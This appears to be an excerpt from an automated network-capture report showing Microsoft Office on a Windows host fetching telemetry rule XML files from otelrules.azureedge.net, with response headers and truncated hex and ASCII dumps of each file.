                                2024-12-03 16:52:04 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                Session IDSource IPSource PortDestination IPDestination Port
                                114192.168.2.55008313.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:52:06 UTC192OUTGET /rules/rule701801v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:06 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:06 GMT
                                Content-Type: text/xml
                                Content-Length: 1403
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                ETag: "0x8DC582BDC2EEE03"
                                x-ms-request-id: a8b72aac-901e-005b-059f-432005000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165206Z-174f7845968jrjrxhC1EWRmmrs00000016eg0000000015ac
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:06 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                Session IDSource IPSource PortDestination IPDestination Port
                                115192.168.2.55008513.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:52:06 UTC192OUTGET /rules/rule703500v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:06 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:06 GMT
                                Content-Type: text/xml
                                Content-Length: 1362
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                ETag: "0x8DC582BDF497570"
                                x-ms-request-id: 0ad7255b-c01e-00ad-65a2-42a2b9000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165206Z-174f7845968ljs8phC1EWRe6en00000015yg00000000tf72
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:06 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


                                Session IDSource IPSource PortDestination IPDestination Port
                                116192.168.2.55008213.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:52:06 UTC192OUTGET /rules/rule703350v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:07 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:06 GMT
                                Content-Type: text/xml
                                Content-Length: 1366
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                ETag: "0x8DC582BDF1E2608"
                                x-ms-request-id: eea98567-901e-007b-3159-44ac50000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165206Z-174f7845968pght8hC1EWRyvxg000000097g00000000vv2a
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:07 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


                                Session IDSource IPSource PortDestination IPDestination Port
                                117192.168.2.55008413.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:52:06 UTC192OUTGET /rules/rule703501v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:07 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:06 GMT
                                Content-Type: text/xml
                                Content-Length: 1399
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
                                ETag: "0x8DC582BE8C605FF"
                                x-ms-request-id: 8a8d0990-701e-0021-2191-3f3d45000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165206Z-174f7845968xr5c2hC1EWRd0hn0000000r2g00000000apwv
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:07 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


                                Session IDSource IPSource PortDestination IPDestination Port
                                118192.168.2.55008613.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:52:06 UTC192OUTGET /rules/rule701800v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:07 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:07 GMT
                                Content-Type: text/xml
                                Content-Length: 1366
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                ETag: "0x8DC582BEA414B16"
                                x-ms-request-id: 2554c198-401e-005b-1ab4-439c0c000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165207Z-174f7845968xlwnmhC1EWR0sv8000000161g00000000ca4h
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:07 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


                                Session IDSource IPSource PortDestination IPDestination Port
                                119192.168.2.55008713.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:52:09 UTC192OUTGET /rules/rule701051v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:09 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:09 GMT
                                Content-Type: text/xml
                                Content-Length: 1399
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT
                                ETag: "0x8DC582BE1CC18CD"
                                x-ms-request-id: fcce73e1-901e-008f-60e1-4167a6000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165209Z-174f7845968swgbqhC1EWRmnb4000000168000000000ubhg
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:09 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe


                                Session IDSource IPSource PortDestination IPDestination Port
                                120192.168.2.55009113.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:52:09 UTC192OUTGET /rules/rule702301v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:09 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:09 GMT
                                Content-Type: text/xml
                                Content-Length: 1399
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT
                                ETag: "0x8DC582BE976026E"
                                x-ms-request-id: ae63cf80-d01e-00ad-1daa-42e942000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165209Z-174f7845968vqt9xhC1EWRgten000000169g0000000085nk
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:09 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr


                                Session IDSource IPSource PortDestination IPDestination Port
                                121192.168.2.55008813.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:52:09 UTC192OUTGET /rules/rule701050v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:09 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:09 GMT
                                Content-Type: text/xml
                                Content-Length: 1362
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                ETag: "0x8DC582BEB256F43"
                                x-ms-request-id: 6460b669-f01e-00aa-725a-448521000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165209Z-174f7845968cpnpfhC1EWR3afc00000015rg00000000rmnr
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:09 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">


                                Session IDSource IPSource PortDestination IPDestination Port
                                122192.168.2.55009013.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:52:09 UTC192OUTGET /rules/rule702751v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:09 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:09 GMT
                                Content-Type: text/xml
                                Content-Length: 1403
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                ETag: "0x8DC582BEB866CDB"
                                x-ms-request-id: 3b4ace6b-101e-0046-10ef-4491b0000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165209Z-174f7845968kvnqxhC1EWRmf3g0000000sx000000000t6a9
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:09 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                Session IDSource IPSource PortDestination IPDestination Port
                                123192.168.2.55008913.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:52:09 UTC192OUTGET /rules/rule702750v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:10 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:09 GMT
                                Content-Type: text/xml
                                Content-Length: 1366
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                ETag: "0x8DC582BE5B7B174"
                                x-ms-request-id: c03fc84f-d01e-0065-80f3-44b77a000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165209Z-174f7845968ljs8phC1EWRe6en000000161000000000gsp0
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:10 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2


                                Session IDSource IPSource PortDestination IPDestination Port
                                124192.168.2.55009413.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:52:12 UTC192OUTGET /rules/rule703400v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:12 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:12 GMT
                                Content-Type: text/xml
                                Content-Length: 1388
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                ETag: "0x8DC582BDBD9126E"
                                x-ms-request-id: cf1b24c6-801e-00a0-09d5-432196000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165212Z-174f7845968cpnpfhC1EWR3afc00000015r000000000u3tx
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:12 UTC1388INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 53 3d 22 4d
